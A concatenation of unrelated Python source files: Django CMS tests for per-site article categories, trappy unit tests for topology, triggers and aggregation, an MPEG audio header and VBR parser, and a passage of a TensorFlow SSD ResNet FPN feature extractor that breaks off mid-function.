publication_date=art1.publication_date-timedelta(1))
art3.sites.add(site2)
art3.save()
self.assertEqual(art1.previous_in_category(), None)
self.assertEqual(art1.next_in_category(), None)
def test_article_category(self):
self._log_as_editor()
article_class = get_article_class()
site1 = Site.objects.get(id=settings.SITE_ID)
site2 = mommy.make(Site)
cat = mommy.make(ArticleCategory)
self.assertEqual(list(cat.sites.all()), [site1])
cat2 = mommy.make(ArticleCategory)
cat2.sites.remove(site1)
cat2.sites.add(site2)
cat2.save()
self.assertEqual(list(cat2.sites.all()), [site2])
cat3 = mommy.make(ArticleCategory)
cat3.sites.remove(site1)
cat3.save()
self.assertEqual(list(cat3.sites.all()), [])
art1 = mommy.make(article_class, slug="test", category=cat, publication=BaseArticle.PUBLISHED)
url = reverse('coop_cms_article_settings', args=[art1.id])
response = self.client.get(url)
self.assertEqual(200, response.status_code)
soup = BeautifulSoup(response.content)
cat_choices = soup.select("select#id_category option")
self.assertEqual(2, len(cat_choices))
self.assertEqual("", cat_choices[0]["value"])
self.assertEqual(str(cat.id), cat_choices[1]["value"])
self.assertEqual(cat.name, cat_choices[1].text)
def test_view_category_articles(self):
    """The category page lists only the articles attached to the current site."""
    mommy.make(ArticleCategory, name="abc")  # unrelated category
    article_class = get_article_class()
    current_site = Site.objects.get(id=settings.SITE_ID)
    extra_site = mommy.make(Site)
    category = mommy.make(ArticleCategory)
    self.assertEqual(list(category.sites.all()), [current_site])
    category.sites.add(extra_site)
    category.save()
    visible_art = mommy.make(article_class, category=category, publication=True, title="#THis is crazy")
    hidden_art = mommy.make(article_class, category=category, publication=True, title="#Call me maybe")
    # Detach the second article from the current site: it must not be listed.
    hidden_art.sites.remove(current_site)
    hidden_art.save()
    response = self.client.get(reverse('coop_cms_articles_category', args=[category.slug]))
    self.assertEqual(response.status_code, 200)
    self.assertContains(response, visible_art.title)
    self.assertNotContains(response, hidden_art.title)
def test_view_category_of_other_site(self):
    """Browsing a category that belongs only to another site returns a 404."""
    mommy.make(ArticleCategory, name="abc")  # unrelated category
    article_class = get_article_class()
    current_site = Site.objects.get(id=settings.SITE_ID)
    extra_site = mommy.make(Site)
    local_cat = mommy.make(ArticleCategory)
    self.assertEqual(list(local_cat.sites.all()), [current_site])
    # remote_cat exists only on the other site.
    remote_cat = mommy.make(ArticleCategory)
    remote_cat.sites.remove(current_site)
    remote_cat.sites.add(extra_site)
    remote_cat.save()
    mommy.make(article_class, slug="test1", category=local_cat, publication=True)
    mommy.make(article_class, slug="test2", category=remote_cat, publication=True)
    response = self.client.get(reverse('coop_cms_articles_category', args=[remote_cat.slug]))
    self.assertEqual(response.status_code, 404)
| |
# Copyright 2015-2016 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import unittest
from trappy.stats.Topology import Topology
from trappy.stats.Trigger import Trigger
from trappy.stats.Aggregator import MultiTriggerAggregator
import collections
import trappy
from trappy.base import Base
import pandas as pd
from pandas.util.testing import assert_series_equal
class TestTopology(unittest.TestCase):
    """Unit tests for trappy.stats.Topology."""

    def test_add_to_level(self):
        """A level added with add_to_level is retrievable via get_level."""
        groups = [[1, 2], [0, 3, 4, 5]]
        name = "test_level"
        topo = Topology()
        topo.add_to_level(name, groups)
        stored = topo.get_level(name)
        self.assertTrue(topo.has_level(name))
        self.assertEqual(groups, stored)

    def test_flatten(self):
        """flatten() returns every CPU of the topology as one sorted flat list."""
        topo = Topology()
        topo.add_to_level("test_level", [[1, 2], [0, 3, 4, 5]])
        self.assertEqual([0, 1, 2, 3, 4, 5], topo.flatten())

    def test_cpu_topology_construction(self):
        """Passing clusters= creates the cluster, cpu and all levels."""
        topo = Topology(clusters=[[0, 3, 4, 5], [1, 2]])
        # The cluster level mirrors the constructor argument.
        self.assertTrue(topo.has_level("cluster"))
        self.assertEqual([[0, 3, 4, 5], [1, 2]], topo.get_level("cluster"))
        # One singleton group per cpu.
        self.assertTrue(topo.has_level("cpu"))
        self.assertEqual([[0], [1], [2], [3], [4], [5]], topo.get_level("cpu"))
        # The "all" level spans every cpu in one group.
        self.assertEqual([[0, 1, 2, 3, 4, 5]], topo.get_level("all"))

    def test_level_span(self):
        """level_span() counts the groups of a level."""
        topo = Topology()
        topo.add_to_level("test_level", [[1, 2], [0, 3, 4, 5]])
        self.assertEqual(topo.level_span("test_level"), 2)

    def test_group_index(self):
        """get_index() returns the position of a group within its level."""
        topo = Topology()
        topo.add_to_level("test_level", [[1, 2], [0, 3, 4, 5]])
        self.assertEqual(topo.get_index("test_level", [1, 2]), 0)
        self.assertEqual(topo.get_index("test_level", [0, 3, 4, 5]), 1)
class BaseTestStats(unittest.TestCase):
    """Shared fixture: a BareTrace with one 'aim_and_fire' event stream and
    a two-cluster (one cpu each) topology."""

    def setUp(self):
        timestamps = pd.Series([0.1, 0.2, 0.3, 0.4, 0.5, 0.6], name="Time")
        columns = {
            "identifier": [0, 0, 0, 1, 1, 1],
            "result": ["fire", "blank", "fire", "blank", "fire", "blank"],
        }
        frame = pd.DataFrame(columns, index=timestamps)
        trace = trappy.BareTrace()
        trace.add_parsed_event("aim_and_fire", frame)
        self._trace = trace
        self.topology = Topology(clusters=[[0], [1]])
class TestTrigger(BaseTestStats):
    """Unit tests for trappy.stats.Trigger."""

    def test_trigger_generation(self):
        """TestTrigger: generate"""
        # The trigger fires on rows where result == "fire"; generate(pivot_val)
        # returns a series holding `value` at the matching timestamps.
        filters = {
            "result": "fire"
        }
        event_class = self._trace.aim_and_fire
        value = 1
        pivot = "identifier"
        trigger = Trigger(self._trace,
                          event_class,
                          filters,
                          value,
                          pivot)
        # identifier 0 fires at 0.1 and 0.3 (see BaseTestStats fixture).
        expected = pd.Series([1, 1], index=pd.Index([0.1, 0.3], name="Time"))
        assert_series_equal(expected, trigger.generate(0))
        # identifier 1 fires at 0.5 only.
        expected = pd.Series([1], index=pd.Index([0.5], name="Time"))
        assert_series_equal(expected, trigger.generate(1))

    def test_trigger_with_func(self):
        """Trigger works with a function or lambda as filter"""
        def my_filter(val):
            # Matches "fire" rows.
            return val.startswith("fi")
        trigger = Trigger(self._trace, self._trace.aim_and_fire,
                          filters={"result": my_filter}, value=1,
                          pivot="identifier")
        expected = pd.Series([1], index=pd.Index([0.5], name="Time"))
        assert_series_equal(expected, trigger.generate(1))
        # Same thing with a lambda matching "blank" rows.
        my_filters = {"result": lambda x: x.startswith("bl")}
        trigger = Trigger(self._trace, self._trace.aim_and_fire,
                          filters=my_filters, value=1, pivot="identifier")
        expected = pd.Series([1, 1], index=pd.Index([0.4, 0.6], name="Time"))
        assert_series_equal(expected, trigger.generate(1))

    def test_trigger_with_callable_class(self):
        """Trigger works with a callable class as filter"""
        class my_filter(object):
            def __init__(self, val_out):
                self.prev_val = 0
                self.val_out = val_out

            def __call__(self, val):
                # Fires when the *previous* row's value matched val_out:
                # the filter is stateful across calls.
                ret = self.prev_val == self.val_out
                self.prev_val = val
                return ret
        trigger = Trigger(self._trace, self._trace.aim_and_fire,
                          filters={"identifier": my_filter(1)}, value=1,
                          pivot="result")
        expected = pd.Series([1], index=pd.Index([0.6], name="Time"))
        assert_series_equal(expected, trigger.generate("blank"))

    def test_filter_prev_values(self):
        """Trigger works with a filter that depends on previous values of the same pivot"""
        # We generate an example in which we want a trigger whenever the
        # identifier is no longer 1 for blank
        class my_filter(object):
            def __init__(self, val_out):
                self.prev_val = 0
                self.val_out = val_out

            def __call__(self, val):
                ret = self.prev_val == self.val_out
                self.prev_val = val
                return ret
        trace = trappy.BareTrace()
        data = collections.OrderedDict([
            (0.1, ["blank", 1]),
            (0.2, ["fire", 1]),
            (0.3, ["blank", 0]),  # value is no longer 1, trigger
            (0.4, ["blank", 1]),
            (0.5, ["fire", 0]),  # This should NOT trigger
            (0.6, ["blank", 0]),  # value is no longer 1 for blank, trigger
        ])
        data_frame = pd.DataFrame.from_dict(data, orient="index", )
        data_frame.columns = ["result", "identifier"]
        trace.add_parsed_event("aim_and_fire", data_frame)
        trigger = Trigger(trace, trace.aim_and_fire,
                          filters={"identifier": my_filter(1)}, value=-1,
                          pivot="result")
        expected = pd.Series([-1, -1], index=[0.3, 0.6])
        assert_series_equal(expected, trigger.generate("blank"))
class TestAggregator(BaseTestStats):
    """Unit tests for trappy.stats.Aggregator.MultiTriggerAggregator.

    Fix: ``self.assertEquals`` (a deprecated alias, removed in
    Python 3.12) is replaced by ``self.assertEqual``.
    """

    def test_scalar_aggfunc_single_trigger(self):
        """TestAggregator: 1 trigger scalar aggfunc"""
        def aggfunc(series):
            return series.sum()

        filters = {
            "result": "fire"
        }
        event_class = self._trace.aim_and_fire
        value = 1
        pivot = "identifier"
        trigger = Trigger(self._trace,
                          event_class,
                          filters,
                          value,
                          pivot)
        aggregator = MultiTriggerAggregator([trigger],
                                            self.topology,
                                            aggfunc=aggfunc)
        # There are three "fire" in total
        # The all level in topology looks like
        # [[0, 1]]
        result = aggregator.aggregate(level="all")
        self.assertEqual(result, [3.0])
        # There are two "fire" on the first node group and a
        # a single "fire" on the second node group at the cluster
        # level which looks like
        # [[0], [1]]
        result = aggregator.aggregate(level="cluster")
        self.assertEqual(result, [2.0, 1.0])

    def test_vector_aggfunc_single_trigger(self):
        """TestAggregator: 1 trigger vector aggfunc"""
        def aggfunc(series):
            return series.cumsum()

        filters = {
            "result": "fire"
        }
        event_class = self._trace.aim_and_fire
        value = 1
        pivot = "identifier"
        trigger = Trigger(self._trace, event_class, filters, value, pivot)
        aggregator = MultiTriggerAggregator([trigger],
                                            self.topology,
                                            aggfunc=aggfunc)
        # There are three "fire" in total
        # The all level in topology looks like
        # [[0, 1]]
        result = aggregator.aggregate(level="all")
        expected_result = pd.Series([1.0, 1.0, 2.0, 2.0, 3.0, 3.0],
                                    index=pd.Index([0.1, 0.2, 0.3, 0.4, 0.5, 0.6])
                                    )
        assert_series_equal(result[0], expected_result)

    def test_vector_aggfunc_multiple_trigger(self):
        """TestAggregator: multi trigger vector aggfunc"""
        def aggfunc(series):
            return series.cumsum()

        filters = {
            "result": "fire"
        }
        event_class = self._trace.aim_and_fire
        value = 1
        pivot = "identifier"
        trigger_fire = Trigger(self._trace,
                               event_class,
                               filters,
                               value,
                               pivot)
        filters = {
            "result": "blank"
        }
        value = -1
        trigger_blank = Trigger(self._trace, event_class, filters, value,
                                pivot)
        aggregator = MultiTriggerAggregator([trigger_fire, trigger_blank],
                                            self.topology,
                                            aggfunc=aggfunc)
        # Each "fire" (+1) is followed by a "blank" (-1), so the running
        # sum across the "all" level alternates between 1 and 0.
        result = aggregator.aggregate(level="all")
        expected_result = pd.Series([1.0, 0.0, 1.0, 0.0, 1.0, 0.0],
                                    index=pd.Index([0.1, 0.2, 0.3, 0.4, 0.5, 0.6])
                                    )
        assert_series_equal(result[0], expected_result)

    def test_default_aggfunc_multiple_trigger(self):
        """MultiTriggerAggregator with the default aggfunc"""
        trigger_fire = Trigger(self._trace, self._trace.aim_and_fire,
                               filters={"result": "fire"},
                               pivot="identifier", value=1)
        trigger_blank = Trigger(self._trace, self._trace.aim_and_fire,
                                filters={"result": "blank"},
                                pivot="identifier", value=2)
        aggregator = MultiTriggerAggregator([trigger_fire, trigger_blank],
                                            self.topology)
        results = aggregator.aggregate(level="cpu")
        expected_results = [
            pd.Series([1., 2., 1., 0., 0., 0.],
                      index=[0.1, 0.2, 0.3, 0.4, 0.5, 0.6]),
            pd.Series([0., 0., 0., 2., 1., 2.],
                      index=[0.1, 0.2, 0.3, 0.4, 0.5, 0.6]),
        ]
        # assertEqual (not the removed assertEquals alias).
        self.assertEqual(len(results), len(expected_results))
        for result, expected in zip(results, expected_results):
            assert_series_equal(result, expected)
| |
# Created By: Virgil Dupras
# Created On: 2004/12/10
# Copyright 2010 Hardcoded Software (http://www.hardcoded.net)
# This software is licensed under the "BSD" License as described in the "LICENSE" file,
# which should be included with this package. The terms are also available at
# http://www.hardcoded.net/licenses/bsd_license
from . import id3v1
from . import id3v2
import struct
from struct import unpack
from .util import tryint, FileOrPath
HEADER_SIZE = 4
ID_MPEG1 = 3
ID_MPEG2 = 2
ID_MPEG25 = 0
ID_LAYER1 = 3
ID_LAYER2 = 2
ID_LAYER3 = 1
MPEG_SYNC = 0xffe00000 # 11 bits set
MPEG_PAD = 0x200 # pad flag mask (pos 20)
BR_NULL = (0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
BR_M1_L1 = (0, 32, 64, 96, 128, 160, 192, 224, 256, 288, 320, 352, 384, 416, 448, 0)
BR_M1_L2 = (0, 32, 48, 56, 64, 80, 96, 112, 128, 160, 192, 224, 256, 320, 384, 0)
BR_M1_L3 = (0, 32, 40, 48, 56, 64, 80, 96, 112, 128, 160, 192, 224, 256, 320, 0)
BR_M2_L1 = (0, 32, 48, 56, 64, 80, 96, 112, 128, 144, 160, 176, 192, 224, 256, 0)
BR_M2_L23 = (0, 8, 16, 24, 32, 40, 48, 56, 64, 80, 96, 112, 128, 144, 160, 0)
BR_M1 = (BR_NULL, BR_M1_L3, BR_M1_L2, BR_M1_L1)
BR_M2 = (BR_NULL, BR_M2_L23, BR_M2_L23, BR_M2_L1)
BR_NULLS = (BR_NULL, BR_NULL, BR_NULL, BR_NULL)
BR_LIST = (BR_M2, BR_NULLS, BR_M2, BR_M1)
SR_NULL = (0, 0, 0, 0)
SR_M1 = (44100, 48000, 32000, 0)
SR_M2 = (22050, 24000, 16000, 0)
SR_M25 = (11025, 12000, 8000, 0)
SR_LIST = (SR_M25, SR_NULL, SR_M2, SR_M1)
SPF_NULL = (0, 0, 0, 0)
SPF_M1 = (0, 1152, 1152, 384)
SPF_M2 = (0, 576, 1152, 384)
SPF_LIST = (SPF_M2, SPF_NULL, SPF_M2, SPF_M1)
MPEG_CM_STEREO = 0
MPEG_CM_JOINT_STEREO = 1
MPEG_CM_DUAL_CHANNEL = 2
MPEG_CM_MONO = 3
MPEG_CM_UNKNOWN = 4
MAX_SEEK_BYTES = 4096
def get_vbr_offset(version, channel_mode):
    """Return the byte offset of the VBR header relative to the frame header.

    The offset depends on the MPEG version and on whether the stream is
    mono (single channel side-info is smaller).
    """
    mono = channel_mode == MPEG_CM_MONO
    if version == ID_MPEG1:
        return 17 if mono else 32
    return 9 if mono else 17
def get_vbr_coefficient(version, layer):
    """Return the coefficient used in the VBR average-bitrate computation.

    The value depends on the MPEG version and on the layer.
    """
    if version == ID_MPEG1:
        return 48 if layer == ID_LAYER1 else 144
    if layer == ID_LAYER1:
        return 24
    return 144 if layer == ID_LAYER2 else 72
class MpegFrameHeader:
    """Decodes a single 32-bit MPEG audio frame header.

    ``data`` is the header packed as a big-endian integer (HEADER_SIZE
    bytes). If the sync bits are absent or a reserved bitrate/sample-rate
    value is encountered, ``valid`` stays/becomes False and the numeric
    attributes are left at zero.
    """
    def __init__(self, data):
        # data = HEADER_SIZE bytes integer
        self.valid = False
        self.mpeg_id = 0
        self.layer = 0
        self.channel_mode = MPEG_CM_UNKNOWN
        self.bitrate = 0  # kbps, from the version/layer bitrate table
        self.sample_rate = 0  # Hz
        self.sample_count = 0  # samples per frame
        self.padding_size = 0  # extra bytes when the pad flag is set
        self.size = 0  # whole frame size in bytes
        # The top 11 bits must all be set (frame sync).
        if (data & MPEG_SYNC) == MPEG_SYNC:
            self.valid = True
            self.mpeg_id = (data >> 19) & 0x3
            self.layer = (data >> 17) & 0x3
            self.channel_mode = (data >> 6) & 0x3
            br_id = (data >> 12) & 0xf  # bitrate table index
            fr_id = (data >> 10) & 0x3  # sample-rate table index
            self.bitrate = BR_LIST[self.mpeg_id][self.layer][br_id]
            self.sample_rate = SR_LIST[self.mpeg_id][fr_id]
            self.sample_count = SPF_LIST[self.mpeg_id][self.layer]
            if data & MPEG_PAD:
                # Layer I pads with a full 4-byte slot, layers II/III with one byte.
                self.padding_size = (4 if self.layer == ID_LAYER1 else 1)
            else:
                self.padding_size = 0
            if self.sample_count and self.bitrate and self.sample_rate:
                sc = self.sample_count
                sr = self.sample_rate
                br = self.bitrate
                pad = self.padding_size
                # frame size = samples/8 * bitrate(bps) / sample_rate + padding
                self.size = (((sc // 8) * br * 1000) // sr) + pad
            else:
                # A zero entry means a reserved table value: not a real frame.
                self.valid = False
class XingHeader:
    """Parses a 'Xing' VBR header from a 128-byte chunk.

    Layout: tag id at offset 0, frame count (big-endian u32) at offset 8,
    byte size at offset 12, quality scale at offset 119.
    """
    def __init__(self, data):  # data is a 128 bytes str
        self.valid = data.startswith(b'Xing')
        self.frames, self.size = unpack('!2I', data[8:16])
        self.scale = data[119]
class FhgHeader:
    """Parses a Fraunhofer 'VBRI' VBR header (first 18 bytes are used).

    Layout: tag id at offset 0, quality scale at offset 9, byte size
    (big-endian u32) at offset 10, frame count at offset 14.
    """
    def __init__(self, data):
        self.valid = data.startswith(b'VBRI')
        self.scale = unpack('B', data[9:10])[0]
        self.size = unpack('!I', data[10:14])[0]
        self.frames = unpack('!I', data[14:18])[0]
class ComputedVBRHeader:
    """VBR stats derived by scanning every frame with a FrameBrowser."""
    def __init__(self, frame_browser):
        frames, total_size = frame_browser.stats()
        self.valid = True
        self.frames = frames
        self.size = total_size
class FrameBrowser:
    """Iterates over the MPEG frames of an open file object.

    On construction, tries to parse a frame header at the current file
    position; failing that, scans forward (skipping any embedded ID3v2
    tag) until a plausible first frame is found.
    """
    def __init__(self, fp):
        self.fp = fp
        self.frame_index = 0
        if not self._read():
            self._seek()
        # Offset of the first valid frame; first() rewinds to it.
        self.initial_position = self.position

    def _read(self):
        # Parse a frame header at the current position; returns its validity.
        self.position = tryint(self.fp.tell())
        data = self.fp.read(HEADER_SIZE)
        try:
            self.frame = MpegFrameHeader(unpack("!I", data)[0])
        except struct.error:
            # Short read (EOF): substitute an invalid header.
            self.frame = MpegFrameHeader(0)
        return self.frame.valid

    def _seek(self):
        # A mpeg header is 11 set bits. Which means that there is a \xff char followed by a char
        # that is \xe0 or more.
        self.fp.seek(self.position, 0)
        data = self.fp.read(MAX_SEEK_BYTES)
        tag_index = data.find(id3v2.ID_ID3)
        if tag_index > -1:
            self.fp.seek(self.position + tag_index, 0)
            h = id3v2.Header(self.fp)
            if h.valid:
                # Skip past the ID3v2 tag and restart the scan after it.
                self.position += tag_index + h.tagsize
                return self._seek()
        index = data.find(b'\xff')
        while (index > -1):
            try:
                result = MpegFrameHeader(unpack('!I', data[index:index + HEADER_SIZE])[0])
                if result.valid:
                    # Only accept the candidate if another valid frame
                    # starts exactly where this one ends.
                    nextindex = index + result.size
                    try:
                        # NOTE(review): `next` shadows the builtin here; it is
                        # local to this loop so no other code is affected.
                        next = MpegFrameHeader(unpack('!I', data[nextindex:nextindex + HEADER_SIZE])[0])
                        if next.valid:
                            self.position += index
                            self.frame = result
                            return True
                    except struct.error:
                        # Candidate's successor lies past the scan buffer; keep looking.
                        pass
                index = data.find(b'\xff', index + 1)
            except struct.error:
                # Truncated header slice: stop scanning.
                index = -1
        return False

    def first(self):
        # Rewind to the first frame and re-parse it.
        self.fp.seek(self.initial_position, 0)
        self.frame_index = 0
        self._read()
        return self.frame

    def __next__(self):
        # Advance past the current frame (only if it is valid) and parse
        # the next header; returns the (possibly invalid) new frame.
        if self.frame.valid:
            self.fp.seek(self.position + self.frame.size, 0)
            self._read()
            self.frame_index += 1
        return self.frame

    def stats(self):
        """Iterates over all frames and return (frame_count, total_size)"""
        self.first()
        size = self.frame.size
        while next(self).valid:
            size += self.frame.size
        return (self.frame_index, size)
def get_vbr_info(fp, b):
    """Return the VBR header (Xing, VBRI or computed) of the file, if any.

    ``b`` is a FrameBrowser positioned on the first frame; ``fp`` must be
    seeked to that frame. Returns None (implicitly) when the first few
    frames share the same bitrate, i.e. the file looks like CBR.
    """
    fheader = b.frame
    vbr_offset = get_vbr_offset(fheader.mpeg_id, fheader.channel_mode)
    fp.seek(vbr_offset + 4, 1)  # +4 skips the 4-byte frame header itself
    vbr_id = fp.read(4)
    fp.seek(-4, 1)  # rewind so the header parsers see the tag id too
    if vbr_id == b'Xing':
        return XingHeader(fp.read(128))
    if vbr_id == b'VBRI':
        return FhgHeader(fp.read(18))
    # No explicit VBR tag: sample the next few frames; if the bitrate
    # varies, scan the whole file to compute the VBR stats.
    br = b.frame.bitrate
    for i in range(4):
        if next(b).bitrate != br:
            return ComputedVBRHeader(b)
class Mpeg:
    '''The class used to handle MPEG metadata.

    :param infile: The file object or path to process.

    :ivar int ~mpeg.Mpeg.audio_offset: The offset, in bytes, at which audio data starts in the file.
    :ivar int ~mpeg.Mpeg.duration: The duration of the audio file (in whole seconds).
    :ivar ~mpeg.Mpeg.id3v1: The ID3 version 1 metadata, if present.
    :vartype id3v1: :class:`hsaudiotag.id3v1.Id3v1`
    :ivar ~mpeg.Mpeg.id3v2: The ID3 version 2 metadata, if present.
    :vartype id3v2: :class:`hsaudiotag.id3v2.Id3v2`
    :ivar int ~mpeg.Mpeg.size: The size of the file, in bytes.
    :ivar ComputedVBRHeader ~mpeg.Mpeg.vbr: The VBR header (Xing/VBRI/computed), or None for CBR files.
    :ivar bool ~mpeg.Mpeg.valid: Whether the file could correctly be read or not.
    '''
    def __init__(self, infile):
        with FileOrPath(infile) as fp:
            self.id3v1 = id3v1.Id3v1(fp)
            self.id3v2 = id3v2.Id3v2(fp)
            # Audio starts after a leading ID3v2 tag, when one is present.
            if self.id3v2.exists and (self.id3v2.position == id3v2.POS_BEGIN):
                start_offset = self.id3v2.size
            else:
                start_offset = 0
            fp.seek(start_offset, 0)
            b = FrameBrowser(fp)
            self._frameheader = b.frame
            self.audio_offset = b.position
            fp.seek(b.position, 0) # Needed for VBR seeking
            self.vbr = get_vbr_info(fp, b)
            # Seek to EOF to measure the total file size.
            fp.seek(0, 2)
            self.size = tryint(fp.tell())
            if self.bitrate:
                # (audio_size * 8) / (bitrate * 1000) == audio_size / (bitrate * 125)
                self.duration = self.audio_size // (self.bitrate * 125)
                # 'and self.id3v2.duration' is there to avoid reading the mpeg frames when there is no TLEN in the tag.
                if self.id3v2.exists and self.id3v2.duration and (self.id3v2.duration != self.duration):
                    # Tag duration and guessed durations are wrong. Read all frames
                    frames, size = b.stats()
                    self.duration = size // (self.bitrate * 125)
            else:
                self.duration = 0
            self.valid = self._frameheader.valid

    # --- Properties
    @property
    def tag(self):
        '''The :class:`hsaudiotag.id3v2.Id3v2` or :class:`hsaudiotag.id3v1.Id3v1`
        metadata object associated with the MPEG file.

        ID3v2 is preferred over ID3v1; None when neither tag exists.
        '''
        if self.id3v2.exists:
            return self.id3v2
        elif self.id3v1.exists:
            return self.id3v1

    @property
    def audio_size(self):
        '''The size of the audio part of the file in bytes.'''
        # Total size minus the ID3v1 tail tag and the leading non-audio bytes;
        # an ID3v2 tag placed at the end of the file is subtracted as well.
        result = self.size - self.id3v1.size - self.audio_offset
        if self.id3v2.position == id3v2.POS_END:
            result -= self.id3v2.size
        return result

    @property
    def bitrate(self):
        '''The bitrate of the audio file.'''
        # For VBR files, derive the average bitrate from the frame count and
        # total byte size reported by the VBR header.
        if self.vbr and (self.vbr.frames > 0):
            coeff = get_vbr_coefficient(self._frameheader.mpeg_id, self._frameheader.layer)
            pad = self._frameheader.padding_size
            sr = self._frameheader.sample_rate
            size_per_frame = self.vbr.size // self.vbr.frames
            return ((size_per_frame - pad) * sr) // (coeff * 1000)
        else:
            return self._frameheader.bitrate

    @property
    def sample_rate(self):
        '''The sample rate of the audio file.'''
        return self._frameheader.sample_rate
| |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""SSD Feature Pyramid Network (FPN) feature extractors based on Resnet v1.
See https://arxiv.org/abs/1708.02002 for details.
"""
import tensorflow as tf
from object_detection.meta_architectures import ssd_meta_arch
from object_detection.models import feature_map_generators
from object_detection.utils import context_manager
from object_detection.utils import ops
from object_detection.utils import shape_utils
from nets import resnet_v1
slim = tf.contrib.slim
class _SSDResnetV1FpnFeatureExtractor(ssd_meta_arch.SSDFeatureExtractor):
  """SSD FPN feature extractor based on Resnet v1 architecture."""

  def __init__(self,
               is_training,
               depth_multiplier,
               min_depth,
               pad_to_multiple,
               conv_hyperparams_fn,
               resnet_base_fn,
               resnet_scope_name,
               fpn_scope_name,
               fpn_min_level=3,
               fpn_max_level=7,
               additional_layer_depth=256,
               reuse_weights=None,
               use_explicit_padding=False,
               use_depthwise=False,
               override_base_feature_extractor_hyperparams=False):
    """SSD FPN feature extractor based on Resnet v1 architecture.

    Args:
      is_training: whether the network is in training mode.
      depth_multiplier: float depth multiplier for feature extractor.
      min_depth: minimum feature extractor depth.
      pad_to_multiple: the nearest multiple to zero pad the input height and
        width dimensions to.
      conv_hyperparams_fn: A function to construct tf slim arg_scope for conv2d
        and separable_conv2d ops in the layers that are added on top of the
        base feature extractor.
      resnet_base_fn: base resnet network to use.
      resnet_scope_name: scope name under which to construct resnet
      fpn_scope_name: scope name under which to construct the feature pyramid
        network.
      fpn_min_level: the highest resolution feature map to use in FPN. The valid
        values are {2, 3, 4, 5} which map to Resnet blocks {1, 2, 3, 4}
        respectively.
      fpn_max_level: the smallest resolution feature map to construct or use in
        FPN. FPN constructions uses features maps starting from fpn_min_level
        upto the fpn_max_level. In the case that there are not enough feature
        maps in the backbone network, additional feature maps are created by
        applying stride 2 convolutions until we get the desired number of fpn
        levels.
      additional_layer_depth: additional feature map layer channel depth.
      reuse_weights: Whether to reuse variables. Default is None.
      use_explicit_padding: Whether to use explicit padding when extracting
        features. Default is False. UNUSED currently.
      use_depthwise: Whether to use depthwise convolutions. UNUSED currently.
      override_base_feature_extractor_hyperparams: Whether to override
        hyperparameters of the base feature extractor with the one from
        `conv_hyperparams_fn`.

    Raises:
      ValueError: On supplying invalid arguments for unused arguments.
    """
    super(_SSDResnetV1FpnFeatureExtractor, self).__init__(
        is_training=is_training,
        depth_multiplier=depth_multiplier,
        min_depth=min_depth,
        pad_to_multiple=pad_to_multiple,
        conv_hyperparams_fn=conv_hyperparams_fn,
        reuse_weights=reuse_weights,
        use_explicit_padding=use_explicit_padding,
        use_depthwise=use_depthwise,
        override_base_feature_extractor_hyperparams=
        override_base_feature_extractor_hyperparams)
    # Explicit padding is accepted by the base class but not implemented here.
    if self._use_explicit_padding is True:
      raise ValueError('Explicit padding is not a valid option.')
    self._resnet_base_fn = resnet_base_fn
    self._resnet_scope_name = resnet_scope_name
    self._fpn_scope_name = fpn_scope_name
    self._fpn_min_level = fpn_min_level
    self._fpn_max_level = fpn_max_level
    self._additional_layer_depth = additional_layer_depth

  def preprocess(self, resized_inputs):
    """SSD preprocessing.

    VGG style channel mean subtraction as described here:
    https://gist.github.com/ksimonyan/211839e770f7b538e2d8#file-readme-mdnge.
    Note that if the number of channels is not equal to 3, the mean subtraction
    will be skipped and the original resized_inputs will be returned.

    Args:
      resized_inputs: a [batch, height, width, channels] float tensor
        representing a batch of images.

    Returns:
      preprocessed_inputs: a [batch, height, width, channels] float tensor
        representing a batch of images.
    """
    if resized_inputs.shape.as_list()[3] == 3:
      # Per-channel ImageNet means (RGB order).
      channel_means = [123.68, 116.779, 103.939]
      return resized_inputs - [[channel_means]]
    else:
      return resized_inputs

  def _filter_features(self, image_features):
    # TODO(rathodv): Change resnet endpoint to strip scope prefixes instead
    # of munging the scope here.
    # Keep only the resnet block outputs, re-keyed by their bare block name.
    filtered_image_features = dict({})
    for key, feature in image_features.items():
      feature_name = key.split('/')[-1]
      if feature_name in ['block1', 'block2', 'block3', 'block4']:
        filtered_image_features[feature_name] = feature
    return filtered_image_features

  def extract_features(self, preprocessed_inputs):
    """Extract features from preprocessed inputs.

    Args:
      preprocessed_inputs: a [batch, height, width, channels] float tensor
        representing a batch of images.

    Returns:
      feature_maps: a list of tensors where the ith tensor has shape
        [batch, height_i, width_i, depth_i]
    """
    preprocessed_inputs = shape_utils.check_min_image_dim(
        129, preprocessed_inputs)
    with tf.variable_scope(
        self._resnet_scope_name, reuse=self._reuse_weights) as scope:
      with slim.arg_scope(resnet_v1.resnet_arg_scope()):
        with (slim.arg_scope(self._conv_hyperparams_fn())
              if self._override_base_feature_extractor_hyperparams else
              context_manager.IdentityContextManager()):
          _, image_features = self._resnet_base_fn(
              inputs=ops.pad_to_multiple(preprocessed_inputs,
                                         self._pad_to_multiple),
              num_classes=None,
              is_training=None,
              global_pool=False,
              output_stride=None,
              store_non_strided_activations=True,
              min_base_depth=self._min_depth,
              depth_multiplier=self._depth_multiplier,
              scope=scope)
      image_features = self._filter_features(image_features)
    depth_fn = lambda d: max(int(d * self._depth_multiplier), self._min_depth)
    with slim.arg_scope(self._conv_hyperparams_fn()):
      with tf.variable_scope(self._fpn_scope_name,
                             reuse=self._reuse_weights):
        # Levels above 5 have no backbone feature map and are built later
        # by extra stride-2 convolutions.
        base_fpn_max_level = min(self._fpn_max_level, 5)
        feature_block_list = []
        for level in range(self._fpn_min_level, base_fpn_max_level + 1):
          # FPN level N corresponds to resnet block N-1.
          feature_block_list.append('block{}'.format(level - 1))
        fpn_features = feature_map_generators.fpn_top_down_feature_maps(
